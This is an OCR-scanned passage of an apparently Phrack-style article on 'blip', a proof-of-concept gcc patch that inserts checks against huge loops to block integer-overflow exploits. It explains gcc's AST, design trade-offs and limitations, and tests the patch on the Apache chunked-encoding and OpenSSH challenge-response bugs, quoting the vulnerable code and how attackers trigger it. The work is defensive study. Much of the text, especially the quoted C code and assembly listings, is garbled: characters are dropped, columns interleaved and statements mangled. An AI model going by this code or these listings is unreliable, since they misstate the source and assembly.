"Big Loop Integer Protection" a.k.a blip. Using the -fblip flag one may 
now be able to protect his application from the next yet to be public 
integer exploit. 


----[ 4.2 - Why gcc? 


Choosing gcc was not a tough decision. First this compiler is one of the 
most common compilers in the Linux, *nix world. Therefore, patching gcc 
will allow protecting all applications compiled with gcc. Second, the 
gcc is open-source therefore it may be feasible to implement this patch 
in the first place. Third, previous security patches were implemented as 
gcc patches (StackGaurd, ProPolice).So why not follow their wisdom? 


9.txt 
eal 


Well.., 


Wed Apr 26 09:43:44 2017 
4.3 - A bit about gcc 


all happy I set down knowing that I’m about to make a gcc patch 
for preventing integer attacks. 


But, except of that, what do I really 


know about gcc at all? I must admit that the answer for that question was 


"not much". 


To overcome t 
about gcc int 
wanted to do, 
jumping to ot 


Two weeks 
and I spent e 
to start modi 


his littl] 
ernals. 


her examples, 


later, I have 
nough time in 


e problem, 
I also hoped to find something similar to what I 
which already exists. 


I was looking for some documentation 


Fast enough, it was clear that before 
I must understand the gcc beast. 


read enough of the 
debugging sessions 


gcc internal documentation, 
of the compiler, to be able 


fying the cod 


However before I start jumping into details 


I would like to provide some background about 
the reader will find useful. 


how gcc works, which I hope 


4.3.1 - Compilation flow 


The gcc compiler is really an amazing machine. 
include the ability to support multiple programming languages, which 
later can be compiled into multiple platforms and instruction sets. 
order to achieve such a goal, the compiler uses several abstraction 
layers. 


The design goals of gcc 


In 


At first, a language file is processed (parsed) by a language "Front 
End". Whenever you invoke the gcc compiler, the compiler will decide 
which of the available "Front End"s is good for parsing the input files, 
and will execute that "Front End". The "Front End" will parse the whole 


input file and will convert it (using many global helper functions) to an 
"Abstract Syntax Tree" (AST). By doing so the "Front End" makes the 
original programming language transparent to the gcc "Back End". The AST 


as its name suggests, is a data-structure, which resides in memory and 
can represent all the features of all the programming languages gcc 
supports. 


Whenever the "Front End" finishes to parse a complete function, and 
converts it to an AST representation, a gcc function called 
rest_of_compilation is being called. This function takes down the AST 
output from the parser and "expands" it into a "Register Transfer 
Language" (RIL). The RTL, which is the "expanded" version of the AST, 
then processed again and again through the many different phases of 


compilation. 


is 


To get a feeling for work that is done o a subset 
list of the different phases is: 

—- Jump Optimization 

CSE (Common sub-expression eliminatio 
Data flow analysis 

Instruction combination 

Instruction scheduling 

Basic block reordering 

Branch shortening 


Final (code generation) 


n the RTL tree, 


n) 


I’ve selected only a few phases out of the big list of phases to 
demonstrate the work done on RTL. The full list is quite mor xtensiv 
and can be found in the gcc internal docs (see "Getting started" for link 
to docs). The nice thing about RTL is that all those phases are performed 
independent of the target machine. 


The last phase which is performed on the RTL tree, will be the "final" 
phase. At that point the RTL representation is ready to be substituted by 
actual assembly instructions that deal with the specific architecture. 
This phase is possible due to the fact that the gcc maintains an abstract 
definition of "machine modes". A set of files that can describe each 
supported machine hardware, and instruction set in a way that makes it 


9.txt Wed Apr 26 09:43:44 2017 7 


possible to translate RTL to the appropriate machine code. 


See [ 4.3.2 - The AST 

I will now focus on the AST, which I will refer to as the "TREE". This 
TREE is the output of the front end parsing of a language file. The TRE 
contains all the information existing in the source file which is 
required for code generation (e.g. declaration, functions, types..). In 
addition the TREE also includes some of the attributes and implicit 
transformations that the compiler may choose to perform (e.g. type 
conversion, auto variables..). 


x 
ar, 


Understanding the TREE is critical for creating this patch. Fortunately 
the TREE is well structured and even if its object-oriented-lik 
programming-using-c is overwhelming at first, after a few debugging 
sessions, every thing starts to fall in place. 


[The core data structure of the TREE is the tree_node (defined in tree.h). 
This structure is actually one big union that can represent any piece of 
information. The way it works is that any tree node has its code, which 
is accessible using "TREE_CODE (tree node)". Using this code the compiler 
may know which of the union fields are relevant for that node (e.g. A 
constant number will have the TREE_CODE() == INTEGER_CST, therefore the 
node->int_cst is going to be the union member that will have the valid 
information.). As a note, I will say that there is no need to access any 
of the tree node structure fields directly. For each and every field in 
that structure there is a dedicated macro that uniforms the access to 
that field. In most cases this macro will contain some additional checks 
of the node, and maybe even some logic to execute whenever access to that 
field is made (e.g. DECL_RTL which is responsible to retrieve the RTL 
representation of a TREE node, will call make_decl() if no RTL expression 
exists for that node). 


So we know about the TREE and tree node, and we know that each node can 
represent many different things, what else is important to know about the 
tree nodes? Well, one thing is the way tr nodes are linked to each 
other. I will try to give a few sample scenarios that represent most of 
the cases where one tr node is related to another one. 


Reference I - Chains: 

A chain is a relation that can be best described as a list. When the 
compiler needs to maintain a list of nodes *that don’t have any link- 
related information*, it will simply use the chain field of the tree node 
(accessible using the TREE_CHAIN() macro). An example for such a case is 
the list of statements nodes in a function body. For each statement in a 
COMPOUND_STMT list there is a chained statement that represents the 
following statement in the code. 


x 


Reference II Lists: 

henever simple chaining is not enough, the compiler will use a special 
ree node code of TREE_LIST. TREE_LIST allows the compiler to save some 
nformation attached to each item on the list. To do so each item in the 
ist is represented by thr tr nodes. The first tree node will have 
he code TREE_LIST. This tree node will have the TREE_CHAIN pointing to 
he next node in the list. It will have the TREE_VALUE pointing to the 
ctual tree node item, and it will also have TREE_PURPOSE which may point 
Oo another tree node that holds extra information about this item meaning 
n the list. As an example the tr node of code CALL_EXPR, will have a 
REE LIST as its second operand. This list will represent the parameters 
nt to the called function. 


OHEGtoOtthHeEoOS 


0) 


Reference III Direct referenc 
Many of the tr node fields are tr nodes themselves. It may be 
confusing at first glance, but it will be clear soon enough. A few common 
examples are: 

— TREE_TYPE this field represent the type of a tree node. For example 
each tree node with expression code must have a type. 
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= 


— DECL_NAME whenever some declaration tr nodes have a name, it will 
not exist as a string pointed directly by the declaration tree node. 
Instead using the DECL_NAME one can get access to another tree node of 
code IDENTIFIER_NODE. The latter will have the requested nam 
information. 


— TREE_OPERAND() One of the most commonly used references. Whenever 
here is a tree node, which has a defined number of "child" tree nodes, 


t 

the TREE_OPERAND() array will be used (e.g. tree node of code IF_STMT 
will have TREE _OPERAND (t,0) as a COND_EXPR node, TREE _OPERAND (t,1) as the 
THEN CLAUSE statement node, and TREE _OPERAND (t,2) as the ELSE CLAUSE 
statement tr node.) 


Reference IV Vectors: 
Last and quite less common is the tr node vector. This container, which 


is accessible using the TREE_VEC_XXX macros, is used to maintain varying 
size vectors. 


There is a lot more to know about AST tree nodes for which the gcc 
internal documents may have better and more complete explanations. So I 
will stop my AST overview here with a suggestion to read the docs. 


In addition to storing the abstract code in the AST. There are several 
global structures, which are being extensively used by the compiler. I 
will try to name a few of those global structures that I found very 
useful to checkout while doing some debugging sessions. 


—- current_stmt_tree : provides the last added stmt to the tree , last 
expression type, and the expression file name. 


—- current/global_binding_level : provides binding information, 
such as defined names in a particular binding level, and block pointers 


—- lineno : var containing the line number that is parsed at the moment 
—- input_filename: file name that is parsed at the moment 


------ [ 4.3.3 - Getting started 


If you want to experience the AST tree yourself, or to dig into the patch 
details, it is recommended to read this getting started section. You are 
safe to continue to the next section if you do not wish to do that. 


First thing first, get the compiler source code. The version I used as 
base for this patch is gcc 3.2. For information about download and build 
of the compiler please check http://gcc.gnu.org/install/ 


(Please remember to specify the compiler version you wish to download. 
The default version may be the last-release, which was not checked 
against this patch) 


Next thing you may want to do is to sit down and carefully read the gcc 
internal documents. ( For the sake of this patch, you should be familiar 
with the first 9 sections of this document ) The document is located 
http://gcec.gnu.org/onlinedocs/gccint/ 


Assuming you read the document and you want to go to the next level, I 
recommend to have a set of simple programs to be used as compiler 
language file, your debugger of choice, and start debugging the compiler. 
Some good break points that you might find useful are: 


- add_stmt : called whenever the parser decides to add a new statement 
into the AST. This break point may be very handy when it is not so clear 
how a specific tr node is being created. By breaking on add_stmt and 
checking up the call stack, it is easy to find more interesting places to 
dig into. 


— rest_of_compiliation : called whenever a function was completely 
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converted into AST representation. If you are interested to check out how 
the AST is turning into RTL this is a good place to start. 


— expand_stmt: called each time a statement is about to be expanded 
into RTL code. Setting a Break point here will allow you to easily 
investigate the structure of an AST tree node without the need to go 
through endless nesting levels. 


<TIP> Since the gcc compiler will end up calling the ccl compiler for *.c 
files, you may want to debug ccl in the first place, and save yourself 
the trouble of making your debugger follow the child process of gcc 
</TIP> 


Soon enough you will need some reference for all the little macros used 
while messing with the AST tree. For that I recommend getting familiar 
with the following files: 


gcc3.2/gcec/gcec/tree.h 
gcc3.2/gcc/gcec/tree.def 


----[ 4.4 - Patch Goals 


Like every project in life, you have to define the project goals. First 
you better know if you reached your goals. Second, which is not less 
important, since resources are limited, it is much easier to protect 
yourself from a never-ending project. 


The goals of this patch were above all to be a proof of concept for the 
suggested integer exploits prevention scheme. Its therefore *not* a goal 
to solve all current and future problems in the security world, or even 
not to solve all exploits that have integer input related to them. 


The second goal of this implementation is to keep the patch simple. Since 
the patch is only a proof of concept, we preferred to keep things simple 
and avoid fancy solutions if they required more complex code. 


Last but not least the third goal is to make this patch usable. That 
means easy to use, intuitive, and able to protect real world packages 
bigger then 30 lines of code :). 


----[ 4.5 - Patch overview 


The patch will introduce a new flag to the gcc compiler named "blip". By 
compiling a file using the -fblip flag, the compiler generates cod 

that will check for the "blip" condition for every for/while loop and for 
every call to a "loop like" function. 


A "loop like" function is any function that is a synonym for a loop. 
(e.g. memcpy, bcopy, memset, etc.). 


The generated check, will evaluate if a loop is about to execute a "Huge" 
number of times. (defined by LIBP_MAX). Each time a loop is about to 
xecute, the generated code verifies that the loop limit is smaller than 
the threshold. If an attempt to execute a loop more than the threshold 
value is identified, the __blip_violation() handler will be called 
instead of the loop, leading to a controlled termination of the 
processes. 


The current version of the patch will support only the C language. This 
decision was made in order to keep this first version of the patch small 
and simple. Also, all the vulnerable packages that this patch was planned 
to protect are written in C. So I thought that having only C is a good 
start. 
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Having the above goals in mind, I had to take some decisions during the 
development of the patch. One of the problems I had was to choose the 
right place to hack the code. There are quite a lot of options available, 
and I will try to give some pros and cons for each option, hoping it will 
help others to mak ducated decisions once they encounter the same 
dilemmas. 


The first thing that I had to decide was the program representation I 
want to modify. The process of compilation looks more or less like that: 


Processing Program representation 


Programming => 1. Source code 


Parsing => 2. AST 
Expanding => 3:5. RIL 
"final" => 4. Object file 


So what is the right place to implement the checks? 


The following table lists some of the pros and cons for modifying the 
code at different stages during the compilation process. 


Stage Pros Cons 
AST Target independent - No access to hardware 
— Language independent Registers, instructions 


— Optimization independent 
—- High level Access to 
language "source" 

- Intuitive to add code 


RTL Target independent - Low level "source" access 
— Language independent —- May interfere with 
- Full access to target optimization 
hardware 
Object file |- Language independent — Hardware dependent 


—- Lack syntax information 
— Modification of flow may 
break compiler logic 


After some thought I decided to modify the AST representation. It seems 
to be the most natural place to do such a change. First, the patch 
doesn’t really need to access low-level information such as hardware 
registers, or even virtual registers allocations. Second, the patch can 
easily modify the AST to inject custom logic into it, while doing the 
same at the RTL level will require major changes, which will hurt the 
abstraction layers defined in gcc. 


Solving my second dilemma was not as easy as the first one. Now that AST 
patching was the plan I had in mind, I needed to find the best point in 
time in which I will examine th xisting AST tree, and emit my checks on 
it. I had three possible options. 


1) Add a call to my function from the parser code of some language (which 
happened to be C). By doing so, I have the chance to evaluate and modify 
the tree "on the fly" and therefore save an extra pass over the tree 
later. A clear disadvantage is the patch becomes language dependent. 


2) Wait until the whole function is parsed by the front-end. Then go 
through the created tree, before converting it to RTL and find the 
places, which require checks, and patch them. An advantage of this method 
is that the patch is no longer language dependent. On the other hand, 
implementing a "tree walk" that will scan a given tree, is quite complex 
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and error prone task, which will go against the goals we defined above 
such as simple, and useful patch. 


3) Patch the AST tree *while* it is being converted into RTL. Although 
this option looks like the most advantageous (language independent, no 
need for a tree walk) it still has a major disadvantage which is the 
uncertainty of being able to *safely* modify the AST tree at that time. 
Since the RTL "conversion machine" is already processed some parts of the 
AST tree, it might be dangerous to patch the AST tree at that time. 


Finally, I have decided that the goal of making this patch simple, 
implies selecting the first option of calling my evolution functions from 
the C parser. 


I’ve placed the hook into my patch in three locations. Two calls inside 
the c-parse.y (main parser file) code allowing me to examine the FOR and 
] a 
p 


WHILE loops and to modify them on the fly. The third call is located 
outside the parser since catching all call locations was quite tricky to 
do from within the parser. Basically since in many different situations a 
CALL_EXPR is created hooking all of them seems to be non-natural. The 
alternative that I found which seems to work just fine for me, was to add 
a call to my function inside the build_function_call() within the c- 


typeck.c file (C compiler type-checking expression builder). 


The main entry into the patch is the blip_check_loop_limit() function 
which will do all the work of checking if a loop seems to be relevant, 
and to call the right function that will do the actual patching of the 
AST tree. 


In order for a loop to be considered it needs to look like a count loop. 
The blip patch will therefore try to examine each loop and decide if the 
loop seems to be a counter loop (exact criteria for examining loops will 
follow). For each count loop an attempt is made to detect the "count" 
variable and the "limit" variable. 


Example of simple loops and their variables: 
-— for(i=0; 2 < 3; 1t+=3}{;} ==> Increment loop, i = count j = limit. 
while (len--){;} ==> decrement loop, len = counter ; 0 = limit. 


The current implementation considers a loop as count loop only if: 
-— 2 variables are detected in the loop condition 
(sometimes one of them can be a constant) 
—- one of those variables is modified in the loop condition or in the 
loop expr 
— *only one* variable is modified 
—- the modification is of the increment / decrement style (++,--,+=, ) 


The code, which examines the loop, is executed in blip_find_loop_vars () 
and it may be improved in the future to identify more loops as count 
loops. 


After detecting the loop direction, the loop count and the limit, the AST 
tree is modified to include a check that verifies that a big loop is 
reported as a blip violation. 


In order to keep the patch simple and risk free, any time a loop seems 
too complex to be understood as count loop, the loop will be ignored 
(Using the blip warning flags its possible to list the ignored loops, and 
the reason why they were ignored). 


------ [ 4.5.2 - Modifying the AST 


When you start patching complex applications such as gcc, you want to 
make sure you are not causing any "butterfly effect" while modifying 
memory resident structures on the fly. To save yourself from a lot of 
trouble I will suggest avoiding modification to any structure directly. 
But instead use th xisting functions that the language parser would 
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have used if the code you want to "inject" was found in the original 
source code. Following this layer of encapsulation will save you from 
making mistakes such as forgetting to initialize a structure member, or 
not updating another global variable or flag. 


I found it very helpful to simulate the code injection by actually 
modifying the source code, and tracing the compiler as it builds the AST 
tree, and later mimicking the code creation by using the same functions 
used by the parser to build my new check code. This way I was able to 
eliminate the need of "dirty" access to the AST tree, which I was quite 
afraid of while starting the modification. 


Knowing the right set of functions to use to inject any code I would 
like, the question became what would I really like to inject? The answer 
differs a bit between the different loop types. In the case of a for-loop 
the blip patch will add the check expression as the last expression in 
the FOR_INIT statement. In the case of the while loop the blip patch will 
add the check expression as a new statement before the while loop. In the 
case of a function call to a "loop like" function such as memcpy, the 
blip patch will replace the whole call expression with a new condition 
expression, having the __blip_violation on the "true" side, and the 
original call expression on the "false" side. 


Let’s illustrate the last paragraph with some samples... 


Before blip 


1) for(i=0;i< len;it++t) {} 
2) While (len-—-) {} 


3) p = memcpy (d,s,1) 


After blip 


1) for (i=0,<blip_check>?__blip_violation:0;i<len;it+t) {} 


2) <blip_check>?__blip_violation:0; 
while (len-—) { } 


3) p = <blip_check>?__blip_violation : memcpy (d,s,1) 


The <blip_check> itself is quite simple. If the loop is incremental 


(going up) then the check will look like: (limit > count && limit-count > 
max). If the loop is going down the check will be (count > limit && 
count - limit > max). There is a need to check the delta between th 
count and the limit and not only the limit since we don’t want to trigger 


false positive in a loop such as: 


len = Oxffff£0000; 
For (i=len-20;i < len; itt) {}; 


The abov xample may look at first like an integer exploit. But it may 
also be a legitimate loop which simply happens to iterate over very high 
values. 


The function responsible for building the <blip_check> is 
blip_build_check_exp(), and its the code is self-explanatory, so I will 
not duplicate the function comments here. 


One of the difficulties I had while injecting the blip code, was the 
injection of the __blip_violation function into the target file. While 
creating the <blip_check> I simply created expressions which reference 
the same tr nodes I found in the loop condition or as parameter to the 
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loop like function call. But the __blip_violation function didn’t exist 
in the name space of the compiled file, and therefore trying to reference 
it was a bit trickier, or so I thought. Usually when a CALL_EXPR is 
created, a FUNCTION_DECL is identified (as one of the available function 
visible to the caller) and an ADDR_EXPR is later created to express th 
address of the declared function. Since __blip_violation was not 
declared , attempts to execute lookup_name() for that name will yield 

an empty declaration. 


Fortunately gcc was kind / forgiving enough, and I was able to builda 

FUNCTION_DECL and reference it leaving all the rest of the work for the 
RTL to figure out. The code, which builds the function call, is located 
j 
mE 


n blip_build_violation_call(). The function body of __blip_violation is 
ocated in the libgcc2.c (Thanks for ProPolice for giving an example..). 


<DISCLAIMER> All the modification above is being done in the spirit of 
proof of concept for the blip integer exploits detection. There is no 
warranty that the patch will actually increase the protection of any 
system, nor that it will keep the compiler stable and usable (while using 
-fblip), nor that any of the coding / patching recommendation made in the 
article will make any sense to the hardcore maintainer of the gcc project 
:>.</DISCLAIMER> 


----[ 4.6 - Limitations 


This section summarizes the limitations known to me at the time of 
writing this article. I will start from the high-level limitations going 
to the low level technical limitations. 


—- The first limitation is the coverage of the patch. The patch is 
designed to stop integer vulnerabilities that yield big loops. Other 
vulnerabilities that are due to bad design or lack of integer validation 
will not be protected. 


For example the following code is vulnerable but cannot be protected by 
the patch: 


void foo(unsigned int len,char* buf) { 
char dst [10]; 
if(len < 10){ 


strcpy (dst,buf); 
} 


Sometimes a generic integer overflow done "by the book" will not be 
detected. An example for such a case will be the xdr_array vulnerability. 
The problem is due to the fact that the malloc function was called with 
the overflowed expression of *two* different integer input, while the 
blip protection can handle only a single big count loop. When looking at 
the xdr_array loop, we can see that it will be easy for the attacker to 
supply such input integers, that will overflow the malloc expression, but 
will still keep the loop count small. 


—- Some count loops will not be considered. On xample is a complex 
loop condition and it is non trivial to identify the count loop. Such 
loops must be ignored, or otherwise false positives may occur which may 
lead to undefined execution. 


— [Technical limitation] The current version is designed to work only 


with C language. 


— [Technical limitation] The current version will not examin mbedded 
assembly code which may include "loop" instructions. Therefore allowing 
integer overflow exploitation to go undetected. 
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--[ 7 - Appendix A - Real life examples 
Having the patch ready, I wanted to give it a test drive on one of the 


known and high profile vulnerabilities. The criteria used for checking 
the patch was: 


—- The package should be compiled successfully with the patch 


-— The patch should be able to protect the package against exploitation 
of the known bugs 


I’ve selected to test the patch on Apache httpd and the OpenSSH packages. 
Since both packages are: high profile, have vulnerabilities that the 
patch should is expected to protect against (in vulnerable version), and 
they are big enough to "qa" the patch a little bit. 


he protection test was proven to be successful:), and the vulnerable 
version compiled with -fblip proved to be non exploitable. 


The following section explains how to compile the packages with the blip 
patch. We will show the output assembly generated before / after the 
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patch for the code which was enabling the exploit to overflow the program 
buffers. 


----[ 7.1 - Apache Chunked encoding 


--[ Vulnerability info 


Just to make sure that all are in sync with the issue of the apache 
chunked-encoding vulnerability I will list part of the vulnerable cod 
followed by some explanation. 


Code: Apache src/main/http_protocol.c : ap_get_client_block () 


O01 len_to_read = get_chunk_size (buffer); 


<some code here...> 

02 r->remaining = len_to_read; 

<some code here...> 

03 len_to_read = (r->remaining > bufsiz) ? bufsiz : r->remaining; 


04 len_read = ap_bread(r->connection->client, buffer , len_to_read); 


The vulnerability in this case allows a remote attacker to senda 
negative chunk length. Doing so will bypass the check at line 3, and will 
end up with calling the ap_bread() with a huge positive number. 


--[ Testing patch 


To compile the apache httpd with the -fblip enabled, one may edit the 
file src/apaci and add the following line at the EOF "echo ’-fblip’". 


Any attempt to send a negative chunk length after compiling apache httpd 
with the blip patch will end up with the httpd executing the 
__blip_violation. 


According to the blip theory, the attack should trigger some kind of a 
loop. We can see at line 4 of the listed code that a call is made to the 
ap_bread() function. So if the theory is correct we are supposed to find 
a loop inside that function. 


* 
* Read up to nbyte bytes into buf. 

* If fewer than byte bytes are currently available, then return those. 
* 

* 


Returns 0 for EOF, -1 for error. 
NOTE EBCDIC: The readahead buffer _always_ contains *unconverted* 


* Only when the caller retrieves data from the buffer (calls bread) 
* is a conversion done, if the conversion flag is set at that time. 


API_EXPORT(int) ap_bread(BUFF *fb, void *buf, int nbyte) 
int. 2, nrd; 


if (fb->flags & B_RDERR) 
return —-1; 

if (nbyte == 0) 
return 0; 


if (!(fb->flags & B_RD)) { 
/* Unbuffered reading. First check if there was something in the 
* buffer from before we went unbuffered. */ 
if (fb->inecnt) { 
i = (fb->incnt > nbyte) ? nbyte : fb->incnt; 
#ifdef CHARSET _EBCDIC 
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if 
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(fb->flags & B_ASCII2! 

ascii2ebcdic (buf, 
else 

#endif /*CHARSET_EBCDIC*/ 
memcpy (buf, fb->inptr, i); 
flb->incnt -= i 
fb->inptr 
return i; 


EBCDIC) 


fb->inptr, i); 


} 

i read_with 
ifdef CHARSET_EBCDIC 

if (i > 0 && ap_bgetflag(fb, B_ASCII2! 
ascii2ebcdic(buf, buf, i); 
/*CHARSET_EBCDIC*/ 
return i; 


_errors(fb, buf, nbyte); 


EBCDIC) ) 


endif 


} 


nrd 
/* can we fill 
if (nrd > 


fb->incnt; 
l the buffer */ 
nbyte) { 


#ifdef CHARS 
if 


alt 


_EBCDIC 


(fb->flags & B_ASCII2! 


ascii2ebcdic (buf, 


EBCDIC) 
fb->inptr, 


nbyte) ; 


else 
/*CHARSET_EBCDIC*/ 
memcpy (buf, fb->inptr, 
flb->incnt nrd nbyt 
fb->inptr += nbyte; 
return nbyte; 


#endif 


nbyte) ; 


’ 


} 


if (nrd > 0) { 
#ifdef CHARSET _EBCDIC 
if (fb->flags & B_ASCII2 
ascii2ebcdic (buf, 

else 
/*CHARSET_]I 
memcpy (buf, fb->inptr, 
nbyte -= nrd; 

buf nrd + (c 
fb->inent 0; 


EBCDIC) 
fb->inptr, nrd); 


#endif EBCDIC*/ 


nrd); 


= har *) buf; 


} 
if 


(fb->flags & BI 
return nrd; 


OF) 


/* do a single read */ 
if (nbyte >= fb->bufsiz) { 

/* read directly into caller’s buffer */ 

lt read_with_errors(fb, buf, nbyte); 
ifdef CHARSET_EBCDIC 

if (i > 0 && ap_bgetflag(fb, B_ASCII2! 
ascii2ebcdic(buf, buf, i); 
RSET_EBCDIC*/ 
(taS= =1), 4 
return nrd ? nrd 


EBCDIC) ) 


endif 


/*CHA 
if 


=; 
} 
} 
else { 
/* read into hold buffer, 
fb->inptr 
i 
if 


then memcpy */ 
fb->inbase; 
read_with_errors (fb, 
(l= 1) 4 

return nrd ? nrd 


fb->inptr, fb->bufsiz); 

ole 

} 

flb->inc 

af «(as > 
a 

oa 


nt = 1; 
nbyte) 
nbyte; 
EBCDIC 


#ifdef CHARS 
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(fb->flags & B_ASCII2EBCDIC) 

ascii2ebcdic(buf, fb->inptr, 
else 

#endif /*CHARSET_EBCDIC*/ 
memcpy (buf, fb->inptr, 
fb->incnt -= i; 
fb->inptr += i; 


if 


1); 


} 


return nrd + i; 


We can see in the code several possible execution flows. 
"loop" that moves all the data into the buf parameter. 


includes a 
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Each one of them 
If the 


code supports CHARSET_EBCDIC then the ascii2ebdcdic function executes the 


deadly 
deadly 


oop. On other 
loop. 


normal cases, 


the memcpy function implements the 


Following is the assembly code generated for the above function. 


type ap_bread, @function 
ap_bread 
pushl sebp 
movl sesp, %sebp 
subl $40, %esp 
movil Sebx, —-12 (Sebp) 
movil Sesi, —8(%Sebp) 
movil sedi, -—4(%ebp) 
movl 8(%Sebp), sedi 
movl 16(%ebp), %Sebx 
testb $16, (%edi) 
je .L68 
movl S-1, %eax 
jmp .L67 
-L68: 
movl $0, %eax 
testl Sebx, tebx 
je .L67 
testb $1, (%edi) 
jne .L70 
cmpl $0, 8(%edi) 
je poly ei 
movil 8(%Sedi), %esi 
cmpl Sebx, Sesi 
jle ~L72 
movl Sebx, %esi 
LIZ 
cmpl $268435456, %esi 
jbe eLl3 
movil Sesi, (%esp) 
call __blip_violation 
jmp .L74 
-L73: 
movl 4(%edi), %eax 
movl 12 (%Sebp), %edx 
movil sedx, (%esp) 
movl seax, 4(%Sesp) 
movil Sesi, 8(%esp) 
call memcpy 
-L74: 
subl Sesi, 8(%edi) 
addl Sesi, 4(%edi) 
movil Sesi, %teax 
jmp .L67 
Pp cal is 
movil sedi, (%esp) 
movl 12 (%Sebp), %eax 
movl seax, 4(%Sesp) 


Blip Check 


(Using esi) 


9.txt 


eh0.3 


-L76: 


a Ee ao 


Ap EY poe 


eioh 9S 


-L80: 


-L78: 


-L81: 


-L82: 
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all 


ovl 


Sebx, 8(%esp) 
read_with_errors 
.L67 


8(%edi), %edx 
sedx, —16(%Sebp) 
Sebx, %tedx 

.L75 

$268435456, %ebx 
.L76 

Sebx, (%esp) 
__blip_violation 
.L77 


4(%edi), %eax 
12 (%sebp), %edx 
sedx, (%esp) 
seax, 4(%Sesp) 
Sebx, 8(%Sesp) 
memcpy 


-16(%ebp), %eax 
Sebx, %teax 
Seax, 8(%edi) 
Sebx, 4(%edi) 
Sebx, %eax 

.L67 


$0, -—16(%ebp) 
.L78 


.L79 
-16(%ebp), %eax 
Seax, (SeEsp) 


__blip_violation 
.L80 


4(%edi seax 
12 (Sebp), %edx 
$edx, esp) 


memcpy 


-16(%ebp), %ebx 
-16(%ebp), %edx 
Sedx, 12 (%Sebp) 
SO, 8(%edi) 


S4, (%edi) 

.L81 

-16(%ebp), %eax 
.L67 


28(%edi), %ebx 
.L82 
Sedi, ) 
12(%Sebp), %teax 
seax, 4(%Sesp) 
Sebx, 8(%esp) 
read_with_errors 
Seax, tesi 

S-1, %eax 

.L85 

.L91 


20(%edi), %eax 


$268435456, -16(%ebp) 


18 
Blip check (using ebx) 
Blip check 


(using [ebp-16]) 


9.txt 


L9xe 


-L86: 


-L88: 


-L89: 


-L90: 


-L85: 


eles 


One can notice that before any cal 
of the 
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Seax, 4(%edi) 
sedi, (%esp) 
Seax, 4(%Sesp) 

28 (sedi), %eax 
Seax, 8(%Sesp) 
read_with_errors 
Seax, Sesi 

S-1, %eax 

.L86 


$0, -16(%ebp) 
Sal 


Sal, %eax 


seax 
-16(%ebp), %eax 
.L67 


Seax, 8(%edi) 
Sebx, %teax 
.L88 

Sebx, %esi 


$268435456, %esi 
-L89 

Sesi, (%esp) 
__blip_violation 
.L90 


4(%edi), %eax 
12 (%Sebp), %tedx 
sedx, (%esp) 
seax, 4(%Sesp) 
Sesi, 8(%esp) 
memcpy 


-16(%ebp), %eax 
Sesi, teax 


-12(%ebp), %ebx 
-8(%Sebp), %Sesi 
-4(%Sebp), sedi 
sebp, %esp 

sebp 
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Blip check (using esi) 


ll to the memcpy function (which is one 
"loop like" functions), a little code was added which calls 


__blip_violation in the case the 3rd parameter of memcpy is bigger than 
blip_max. 


Another thing worth mentioning is the way the injected check is accessing 


this 3rd parameter. 
is stored at th 
stored in th 
on the stack at ebp-16. 


In the first block of the injected code the parameter 


Si register, at the second block the parameter is 


bx register and in the third block the parameter is stored 
The reason for that is very simple. Since the 


modification of the code was done at the AST tree, and since the patch 
was using the exact same tree node that was used in the call expression 


to memcpy, 


and t 


the RTL generated the sam 


he check 


xpression. 


code for both the call expression 


Now lets go back to the ap_bread function. And lets assume that the 


CHARS! 


ET_EBCDIC was indeed defined. 


would have being the one to have the 
that the blip patch would check the loop in that function as well. 


In that case the ascii2ebcdic function 


"vulnerable" loop. Therefore we hop 
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The following is the ascii2ebcdic code taken from src/ap/ap_ebcdic.c 


API_EXPORT (void *) 
ascii2ebcdic(void *dest, const void *srce, size_t count) 


{ 


unsigned char *udest = dest; 
const unsigned char *usrce = srce; 


while (count-- 
*udestt+t+ 


} 


return dest; 


b= oO) 4 


= os_toebcdic[*usrcett]; 


Result of compiling the above function with the -fblip 


-type 
ascii2ebcdic: 


pushl 
movl 

pushl 
pushl 
pushl 
subl 


~L12: 


-L16: 


-L18: 


.Lfe2: 


ascii2ebcdic, @function 


Sebp 


sesp, %sebp 


Sedi 
Sesi 
Sebx 


$12, %esp 
16(%ebp), Sebx 


8(Sebp), Sedi 
12(%Sebp), %Sesi 
$0, %ebx 

-L12 

$268435456, %ebx 
-L12 Blip check 
Sebx, (%esp) 
__blip_violation 
Sebx 

S-1, %ebx 

.L18 

(Sesi), %eax 


os_toebcdic(%eax), %eax 
Sal, (%edi) 


Sesi 
Sedi 
Sebx 


S-1, %ebx 


-L16 


8 (Sebp) 


, SeAaXx 


$12, %esp 


Sebx 
Sesi 
sedi 
sebp 


While processing the ascii2ebcdic function, the blip patch identified the 
while loop as a count-loop. The loop condition supplies all the 
information required to create a <blip_check>. First we identify the 
variables of the loop. 
"QO" is the second one. 
"count" is decremented 
only modified variable 


In this case "count" is one var and the constant 

Looking for variable modification, we can see that 
in the expression "count--". Since "count" is the 
we can say that "count" is the count-variable and 
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9 
the constant 0 is the limit-variable. We can also say that the loop is a 
decrement-—loop since the modification operation is "--". The check 
therefore will be (count > limit && count - limit > MAX_BLIP). Looking at 
t 

e 

( 

a 


he above assembly code, we can see that the loop count is stored in the 
bx register (Its easy to spot this by looking at the code below label 12 
L12). This code represent the while condition. It first decrements ebx 
nd later compares it with the loop constant). The <blip_check> therefore 
will utilize th bx register for the check. 


----[ 7.2 - OpenSSH auth 


--[ Vulnerability info 


The OpenSSH Vulnerability is an example of an integer overflow bug, which 
results in a miscalculated allocation size. The following is a snippet of 
the vulnerable cod 


OpenSSH auth2-chall.c : input_userauth_info_response() 


01 nresp = packet_get_int(); 


<some code here ..> 

02 response = xmalloc(nresp * sizeof (char*))j; 
03 for(i = 0; i < nresp; itt) 

04 response[i] = packet_get_string (NULL) ; 


At line 01 the code reads an integer into an unsigned variable. Later the 
code allocates an array with nresp entries. The problem is that nresp * 
sizeof (char*) is an expression that may overflow. Therefore sending nresp 
bigger than 0x40000000 allows allocation of a small buffer that can be 
later overflowed by the assignment in line 04. 


--[ Testing the patch 


To compile the OpenSSH package with the -fblip enabled, one may add — 
fblip to the CFLAGS definition at Makefile.in (i.e. CFLAGS=@CFLAGS@ - 
fblip) 


Any attempt to send a large number of responses after compiling OpenSSH 
with the blip patch will end up with OpenSSH executing the 
__blip_violation. 


The following is snippet of the vulnerable function. 


static void 
input_userauth_info_response(int type, u_int32_t seq, void *ctxt) 
{ 

Authetxt *authetxt = ctxt; 

KbdintAuthctxt *kbdintctxt; 

int i, authenticated = 0, res, len; 

u_int nresp; 

char **response = NULL, *method; 


<omitted code> 


nresp = packet_get_int(); 
